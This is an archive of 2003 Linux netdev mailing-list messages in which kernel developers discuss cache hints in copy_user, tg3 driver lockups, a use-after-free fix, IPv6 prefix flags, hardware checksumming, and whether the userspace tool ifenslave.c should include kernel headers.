palrel11.hp.com (palrel11.hp.com [156.153.255.246]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G6WpFl005364 for ; Tue, 15 Jul 2003 23:32:51 -0700 Received: from hplms2.hpl.hp.com (hplms2.hpl.hp.com [15.0.152.33]) by palrel11.hp.com (Postfix) with ESMTP id A5F771C02401; Tue, 15 Jul 2003 23:32:50 -0700 (PDT) Received: from napali.hpl.hp.com (napali.hpl.hp.com [15.4.89.123]) by hplms2.hpl.hp.com (8.12.9/8.12.9/HPL-PA Hub) with ESMTP id h6G6WnJT020030; Tue, 15 Jul 2003 23:32:50 -0700 (PDT) Received: from napali.hpl.hp.com (localhost [127.0.0.1]) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) with ESMTP id h6G6WnrK006803; Tue, 15 Jul 2003 23:32:49 -0700 Received: (from davidm@localhost) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) id h6G6WmIq006799; Tue, 15 Jul 2003 23:32:48 -0700 From: David Mosberger MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <16148.61840.663255.863176@napali.hpl.hp.com> Date: Tue, 15 Jul 2003 23:32:48 -0700 To: "David S. Miller" Cc: davidm@hpl.hp.com, davidm@napali.hpl.hp.com, scott.feldman@intel.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [patch] e1000 TSO parameter In-Reply-To: <20030715183911.1c18cc15.davem@redhat.com> References: <20030714214510.17e02a9f.davem@redhat.com> <16147.37268.946613.965075@napali.hpl.hp.com> <20030714223822.23b78f9b.davem@redhat.com> <16148.34787.633496.949441@napali.hpl.hp.com> <20030715183911.1c18cc15.davem@redhat.com> X-Mailer: VM 7.07 under Emacs 21.2.1 Reply-To: davidm@hpl.hp.com X-URL: http://www.hpl.hp.com/personal/David_Mosberger/ X-archive-position: 4094 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davidm@napali.hpl.hp.com Precedence: bulk X-list: netdev >>>>> On Tue, 15 Jul 2003 18:39:11 -0700, "David S. Miller" said: >> We could, but would it always be a win? Especially for >> copy_from_user(). Most of the time, that data remains cached, so >> I don't think we'd want to use non-temporal stores on those (in >> general). csum_and_copy_from_user() isn't well optimized yet. >> Let's see if I can find a volunteer... ;-) DaveM> No, I mean "bypass L2 cache on miss" for stores. Don't tell DaveM> me IA64 doesn't have that? 8) I certainly didn't mean "always DaveM> bypass L2 cache" for stores :-) What I'm saying is that I almost always want copy_user() to put the destination data in the cache, even if it isn't cached yet. Many copy_user() calls are for for data structures that easily fit in the cache and the data is usually used quickly afterwards. As for cache-hints supported by IA64: the architecture supports various non-temporal hints (non-temporal in 1st, 2nd, or all cache-levels). How these hints are implemented depends on the chip. On McKinley, non-temporal hints are generally implemented by storing the data in the cache without updating the LRU info. So if the data is already there, it will stay cached (until a victim is needed). --david From davem@redhat.com Tue Jul 15 23:41:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 23:41:08 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G6f3Fl005746 for ; Tue, 15 Jul 2003 23:41:04 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id XAA16042; Tue, 15 Jul 2003 23:30:35 -0700 Date: Tue, 15 Jul 2003 23:30:34 -0700 From: "David S. Miller" To: davidm@hpl.hp.com Cc: davidm@napali.hpl.hp.com, scott.feldman@intel.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [patch] e1000 TSO parameter Message-Id: <20030715233034.31bf0709.davem@redhat.com> In-Reply-To: <16148.61840.663255.863176@napali.hpl.hp.com> References: <20030714214510.17e02a9f.davem@redhat.com> <16147.37268.946613.965075@napali.hpl.hp.com> <20030714223822.23b78f9b.davem@redhat.com> <16148.34787.633496.949441@napali.hpl.hp.com> <20030715183911.1c18cc15.davem@redhat.com> <16148.61840.663255.863176@napali.hpl.hp.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4095 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 23:32:48 -0700 David Mosberger wrote: > DaveM> No, I mean "bypass L2 cache on miss" for stores. Don't tell > DaveM> me IA64 doesn't have that? 8) I certainly didn't mean "always > DaveM> bypass L2 cache" for stores :-) > > What I'm saying is that I almost always want copy_user() to put the > destination data in the cache, even if it isn't cached yet. No you don't :-) If you miss, you do a bypass to main memory. Then when the app asks for the data (if it even does at all, consider that) it get's a clean copy in it's L2 cache. Overall it's more efficient this way. > Many copy_user() calls are for for data structures that > easily fit in the cache and the data is usually used quickly afterwards. Absolutely correct. We can't use the cache bypass-on-miss stores on sparc64 unless the copy is at least a couple of cachelines in size. It all works out, don't worry :-) From greearb@candelatech.com Wed Jul 16 00:04:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 00:04:53 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G74lFl006378 for ; Wed, 16 Jul 2003 00:04:47 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6G74fKk029607; Wed, 16 Jul 2003 00:04:41 -0700 Message-ID: <3F14F909.3070009@candelatech.com> Date: Wed, 16 Jul 2003 00:04:41 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: netdev@oss.sgi.com Subject: Re: tg3 and machine lockup? References: <3F14DD9C.9090807@candelatech.com> <20030715220810.24bf073f.davem@redhat.com> In-Reply-To: <20030715220810.24bf073f.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4096 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev David S. Miller wrote: > On Tue, 15 Jul 2003 22:07:40 -0700 > Ben Greear wrote: > > >>Now, it could be one of a million things...but just curious if anyone >>else has seen anything like this. Kernel is 2.4.20 + my hacks. > > > There were tons of locking fixes to the tg3 driver > in 2.4.21 > Cool, just moving to that now. Will let you know how it goes. Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From ja@ssi.bg Wed Jul 16 00:09:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 00:09:42 -0700 (PDT) Received: from l.himel.bg (IDENT:root@unamed.infotel.bg [212.39.68.18] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G79VFl006788 for ; Wed, 16 Jul 2003 00:09:33 -0700 Received: from linux.himel.bg (IDENT:ja@linux.himel.bg [127.0.0.1]) by l.himel.bg (8.11.6/8.9.3) with ESMTP id h6G792L02153; Wed, 16 Jul 2003 10:09:02 +0300 Date: Wed, 16 Jul 2003 10:09:02 +0300 (EEST) From: Julian Anastasov X-X-Sender: ja@l To: "David S. Miller" cc: netdev@oss.sgi.com Subject: Re: [patches] invalid nh.raw use after free In-Reply-To: <20030715191709.1e0c6427.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4097 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ja@ssi.bg Precedence: bulk X-list: netdev Hello, On Tue, 15 Jul 2003, David S. Miller wrote: > > sure if there are more instances), where pointers remain to refer to > > freed skbs. For 2.5 and 2.4. > > Good catch, I'll apply this. Please, apply also to 2.2 Regards -- Julian Anastasov From davem@redhat.com Wed Jul 16 00:27:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 00:27:21 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G7R5Fl007246 for ; Wed, 16 Jul 2003 00:27:06 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id AAA16134; Wed, 16 Jul 2003 00:17:24 -0700 Date: Wed, 16 Jul 2003 00:17:24 -0700 From: "David S. Miller" To: Julian Anastasov Cc: netdev@oss.sgi.com Subject: Re: [patches] invalid nh.raw use after free Message-Id: <20030716001724.7874a51a.davem@redhat.com> In-Reply-To: References: <20030715191709.1e0c6427.davem@redhat.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4098 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 10:09:02 +0300 (EEST) Julian Anastasov wrote: > On Tue, 15 Jul 2003, David S. Miller wrote: > > > Good catch, I'll apply this. > > Please, apply also to 2.2 Please forward to Alan for that, I don't have the resources to maintain 2.2.x along with all the other stuff. From yoshfuji@linux-ipv6.org Wed Jul 16 01:37:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 01:38:14 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G8buFl008314 for ; Wed, 16 Jul 2003 01:37:57 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6G8dRBo032450; Wed, 16 Jul 2003 17:39:28 +0900 Date: Wed, 16 Jul 2003 17:39:26 +0900 (JST) Message-Id: <20030716.173926.81875946.yoshfuji@linux-ipv6.org> To: kuznet@ms2.inr.ac.ru Cc: krkumar@us.ibm.com, davem@redhat.com, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org, linux-net@vger.kernel.org Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <200307160021.EAA10195@dub.inr.ac.ru> References: <3F14492C.30708@us.ibm.com> <200307160021.EAA10195@dub.inr.ac.ru> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4099 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev Hello. In article <200307160021.EAA10195@dub.inr.ac.ru> (at Wed, 16 Jul 2003 04:21:33 +0400 (MSD)), kuznet@ms2.inr.ac.ru says: > Select yourself: either IFA_IFFLAGS or translated flags in ifa_flags. > I prefer the second way just because it is too unpleasant to add > a new attribute for sake of two bits with no visible candidates > to use remaining ones. Well, I dislike ifa_flags because - it is conceptually wrong to combine them. e.g. even if all autoconf addresses expired, flags lasts and we should report it to userspace. - ifa_flags is extremely expensive resource. There are only 8 bits. Use it only for addresses. My suggestion is: - create L3 per-interface RTM, say, RTM_xxxIFACE. - provide inet_device / inet6_dev things via this RTM. e.g. per-interface statistics, flags etc. -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From mmj@suse.de Wed Jul 16 02:24:01 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 02:24:08 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G9O0Fl010571 for ; Wed, 16 Jul 2003 02:24:01 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id 9F99E1460E; Wed, 16 Jul 2003 11:23:54 +0200 (MEST) Date: Wed, 16 Jul 2003 11:23:54 +0200 From: Mads Martin =?iso-8859-1?Q?J=F8rgensen?= To: "David S. Miller" Cc: netdev@oss.sgi.com Subject: /usr/src/linux/Documentation/networking/ifenslave.c Message-ID: <20030716092354.GC24077@suse.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4i X-archive-position: 4100 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mmj@suse.de Precedence: bulk X-list: netdev $SUBJECT is a userspace tool, but includes kernel headers. This small obvious patch against 2.6.0-test1 should fix it. --- ifenslave.c +++ ifenslave.c @@ -97,8 +97,7 @@ #include #include #include -#include -#include +#include #include #include #include -- Mads Martin Joergensen, http://mmj.dk "Why make things difficult, when it is possible to make them cryptic and totally illogical, with just a little bit more effort?" -- A. P. J. From davem@redhat.com Wed Jul 16 05:52:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 05:52:34 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GCqOFl017025 for ; Wed, 16 Jul 2003 05:52:25 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id FAA22146; Wed, 16 Jul 2003 05:42:55 -0700 Date: Wed, 16 Jul 2003 05:42:55 -0700 From: "David S. Miller" To: Mads Martin =?ISO-8859-1?Q?J=F8rgensen?= Cc: netdev@oss.sgi.com Subject: Re: /usr/src/linux/Documentation/networking/ifenslave.c Message-Id: <20030716054255.1922d299.davem@redhat.com> In-Reply-To: <20030716092354.GC24077@suse.de> References: <20030716092354.GC24077@suse.de> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6GCqOFl017025 X-archive-position: 4101 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 11:23:54 +0200 Mads Martin Jørgensen wrote: > $SUBJECT is a userspace tool, but includes kernel headers. This small > obvious patch against 2.6.0-test1 should fix it. This patch is absolutely senseless, you eliminate two such includes > -#include > -#include > +#include but three more still remain. > #include > #include > #include This whole anti-kernel-headers-in-userspace thing is a total shamans dance and not founded in reality. Quick, answer this as fast as you can, where in the glibc headers can you get at the PFKEY and XFRM_NETLINK interface definitions to configure IPSEC stuff in the kernel? BZZT, time is up, and I know you have no answer :-) That is why all of this is rediculious. From mmj@suse.de Wed Jul 16 05:59:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 05:59:22 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GCxFFl017851 for ; Wed, 16 Jul 2003 05:59:17 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id 94A5B14485; Wed, 16 Jul 2003 14:59:10 +0200 (MEST) Date: Wed, 16 Jul 2003 14:59:10 +0200 From: Mads Martin =?iso-8859-1?Q?J=F8rgensen?= To: "David S. Miller" Cc: netdev@oss.sgi.com Subject: Re: /usr/src/linux/Documentation/networking/ifenslave.c Message-ID: <20030716125910.GB10817@suse.de> References: <20030716092354.GC24077@suse.de> <20030716054255.1922d299.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030716054255.1922d299.davem@redhat.com> User-Agent: Mutt/1.4i X-archive-position: 4102 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mmj@suse.de Precedence: bulk X-list: netdev * David S. Miller [Jul 16. 2003 14:52]: > This whole anti-kernel-headers-in-userspace thing is a > total shamans dance and not founded in reality. Urgs. > Quick, answer this as fast as you can, where in the glibc headers can > you get at the PFKEY and XFRM_NETLINK interface definitions to > configure IPSEC stuff in the kernel? > > BZZT, time is up, and I know you have no answer :-) :-) > That is why all of this is rediculious. Problem is some of these includes are different on different archs, and causes the thing to miscompile. How to fix that then? -- Mads Martin Joergensen, http://mmj.dk "Why make things difficult, when it is possible to make them cryptic and totally illogical, with just a little bit more effort?" -- A. P. J. From ralph@istop.com Wed Jul 16 06:03:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 06:03:29 -0700 (PDT) Received: from smtp.istop.com (dci.doncaster.on.ca [66.11.168.194]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GD3EFl018249 for ; Wed, 16 Jul 2003 06:03:14 -0700 Received: from ns.istop.com (ns.istop.com [66.11.168.199]) by smtp.istop.com (Postfix) with ESMTP id 05D9536993; Wed, 16 Jul 2003 08:33:05 -0400 (EDT) Date: Wed, 16 Jul 2003 08:33:04 -0400 (EDT) From: Ralph Doncaster Reply-To: ralph+d@istop.com To: Jeff Garzik Cc: Dan Hollis , linux-netdev Subject: Re: [Bonding-devel] Re: [RFC][bonding] Improve VLAN support on top of bonding In-Reply-To: <3F14807E.30402@pobox.com> Message-ID: References: <3F14807E.30402@pobox.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4103 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ralph@istop.com Precedence: bulk X-list: netdev On Tue, 15 Jul 2003, Jeff Garzik wrote: > Ralph Doncaster wrote: > > On Tue, 15 Jul 2003, Dan Hollis wrote: > > > > > >>That is exactly what it does. hw tcp checksumming helps a LOT at gbe rates > > > > > > This still doesn't make any sense. The copy from user-space to kernel > > space does the checksum as far as I recall (unless you use the > > router-not-host kernel build option). > > > Not for the zero-copy case. How common is this? As far as I can tell, Apache 1.3 doesn't use sendfile (you need 2.0 for that). And even if 1.3 is using EnableMMAP with a large write, you're limited to the size of SO_SNDBUF (or maybe only a single page?). This is not to say hw csum is a bad thing. I think the linux IP stack should support it. When I was looking at the 2.4.19 code I noticed the 3c59x driver code supported hw csum, but I couldn't find anything in the IP stack that used the csum flags set by the driver... -Ralph From davem@redhat.com Wed Jul 16 06:19:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 06:19:52 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GDJgFl018790 for ; Wed, 16 Jul 2003 06:19:43 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id GAA22258; Wed, 16 Jul 2003 06:10:14 -0700 Date: Wed, 16 Jul 2003 06:10:13 -0700 From: "David S. Miller" To: Mads Martin =?ISO-8859-1?Q?J=F8rgensen?= Cc: netdev@oss.sgi.com Subject: Re: /usr/src/linux/Documentation/networking/ifenslave.c Message-Id: <20030716061013.64f14a04.davem@redhat.com> In-Reply-To: <20030716125910.GB10817@suse.de> References: <20030716092354.GC24077@suse.de> <20030716054255.1922d299.davem@redhat.com> <20030716125910.GB10817@suse.de> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6GDJgFl018790 X-archive-position: 4104 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 14:59:10 +0200 Mads Martin Jørgensen wrote: > > That is why all of this is rediculious. > > Problem is some of these includes are different on different archs, and > causes the thing to miscompile. How to fix that then? Nothing arch specific resides in linux/if.h :-) This means the problem eminates from asm/*.h headers which is where the fixes belong. What exactly is the error you get on ia64? From mmj@suse.de Wed Jul 16 06:35:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 06:35:28 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GDZKFl019354 for ; Wed, 16 Jul 2003 06:35:21 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id 35AB014646; Wed, 16 Jul 2003 15:35:15 +0200 (MEST) Date: Wed, 16 Jul 2003 15:35:14 +0200 From: Mads Martin =?iso-8859-1?Q?J=F8rgensen?= To: "David S. Miller" Cc: netdev@oss.sgi.com Subject: Re: /usr/src/linux/Documentation/networking/ifenslave.c Message-ID: <20030716133514.GB7184@suse.de> References: <20030716092354.GC24077@suse.de> <20030716054255.1922d299.davem@redhat.com> <20030716125910.GB10817@suse.de> <20030716061013.64f14a04.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030716061013.64f14a04.davem@redhat.com> User-Agent: Mutt/1.5.4i X-archive-position: 4105 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mmj@suse.de Precedence: bulk X-list: netdev * David S. Miller [Jul 16. 2003 15:21]: > > > That is why all of this is rediculious. > > > > Problem is some of these includes are different on different archs, and > > causes the thing to miscompile. How to fix that then? > > Nothing arch specific resides in linux/if.h :-) > > This means the problem eminates from asm/*.h headers which is > where the fixes belong. Yes. What fix, would you propose? > What exactly is the error you get on ia64? a bunch of compile errors like the following: In file included from /usr/src/linux/include/asm/system.h:19, from /usr/src/linux/include/asm/atomic.h:17, from /usr/src/linux/include/linux/netdevice.h:32, from /usr/src/linux/include/linux/if_arp.h:26, from ifenslave.c:91: /usr/src/linux/include/asm/pal.h:89: parse error before "pal_status_t" /usr/src/linux/include/asm/pal.h:89: warning: type defaults to `int' in declaration of `pal_status_t' /usr/src/linux/include/asm/pal.h:89: warning: data definition has no type or storage class /usr/src/linux/include/asm/pal.h:102: parse error before "pal_cache_level_t" /usr/src/linux/include/asm/pal.h:102: warning: type defaults to `int' in declaration of `pal_cache_level_t' /usr/src/linux/include/asm/pal.h:102: warning: data definition has no type or storage class /usr/src/linux/include/asm/pal.h:110: parse error before "pal_cache_type_t" /usr/src/linux/include/asm/pal.h:110: warning: type defaults to `int' in declaration of `pal_cache_type_t' /usr/src/linux/include/asm/pal.h:110: warning: data definition has no type or storage class /usr/src/linux/include/asm/pal.h:123: parse error before "pal_cache_line_state_t etc. thanks, -- Mads Martin Joergensen, http://mmj.dk "Why make things difficult, when it is possible to make them cryptic and totally illogical, with just a little bit more effort?" -- A. P. J. From davem@redhat.com Wed Jul 16 06:38:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 06:38:15 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GDc1Fl019714 for ; Wed, 16 Jul 2003 06:38:02 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id GAA22350; Wed, 16 Jul 2003 06:28:33 -0700 Date: Wed, 16 Jul 2003 06:28:33 -0700 From: "David S. Miller" To: Mads Martin =?ISO-8859-1?Q?J=F8rgensen?= Cc: netdev@oss.sgi.com Subject: Re: /usr/src/linux/Documentation/networking/ifenslave.c Message-Id: <20030716062833.2c25906f.davem@redhat.com> In-Reply-To: <20030716133514.GB7184@suse.de> References: <20030716092354.GC24077@suse.de> <20030716054255.1922d299.davem@redhat.com> <20030716125910.GB10817@suse.de> <20030716061013.64f14a04.davem@redhat.com> <20030716133514.GB7184@suse.de> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6GDc1Fl019714 X-archive-position: 4106 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 15:35:14 +0200 Mads Martin Jørgensen wrote: > * David S. Miller [Jul 16. 2003 15:21]: > In file included from /usr/src/linux/include/asm/system.h:19, > from /usr/src/linux/include/asm/atomic.h:17, > from /usr/src/linux/include/linux/netdevice.h:32, > from /usr/src/linux/include/linux/if_arp.h:26, > from ifenslave.c:91: > /usr/src/linux/include/asm/pal.h:89: parse error before "pal_status_t" IA64 needs it's __KERNEL__ ifdefs fixed up, nothing more. Thanks for finding the right place to fix this problem :-) From garzik@gtf.org Wed Jul 16 07:12:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 07:12:19 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GECCFl020577 for ; Wed, 16 Jul 2003 07:12:13 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id A5A866649; Wed, 16 Jul 2003 10:12:06 -0400 (EDT) Date: Wed, 16 Jul 2003 10:12:06 -0400 From: Jeff Garzik To: "David S. Miller" Cc: Mads Martin J?rgensen , netdev@oss.sgi.com Subject: Re: /usr/src/linux/Documentation/networking/ifenslave.c Message-ID: <20030716141206.GB5628@gtf.org> References: <20030716092354.GC24077@suse.de> <20030716054255.1922d299.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030716054255.1922d299.davem@redhat.com> User-Agent: Mutt/1.3.28i X-archive-position: 4107 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Wed, Jul 16, 2003 at 05:42:55AM -0700, David S. Miller wrote: > This whole anti-kernel-headers-in-userspace thing is a > total shamans dance and not founded in reality. There ARE definitions that differ between kernel and userspace. Thinking they are the same is not founded in reality. And thinking that all of userspace is instantly recompiled against against the latest kernel headers isn't founded in reality, either. Jeff From davem@redhat.com Wed Jul 16 07:24:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 07:24:10 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GEO1Fl021013 for ; Wed, 16 Jul 2003 07:24:06 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id HAA22530; Wed, 16 Jul 2003 07:14:26 -0700 Date: Wed, 16 Jul 2003 07:14:26 -0700 From: "David S. Miller" To: Jeff Garzik Cc: mmj@suse.de, netdev@oss.sgi.com Subject: Re: /usr/src/linux/Documentation/networking/ifenslave.c Message-Id: <20030716071426.11449bed.davem@redhat.com> In-Reply-To: <20030716141206.GB5628@gtf.org> References: <20030716092354.GC24077@suse.de> <20030716054255.1922d299.davem@redhat.com> <20030716141206.GB5628@gtf.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4108 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 10:12:06 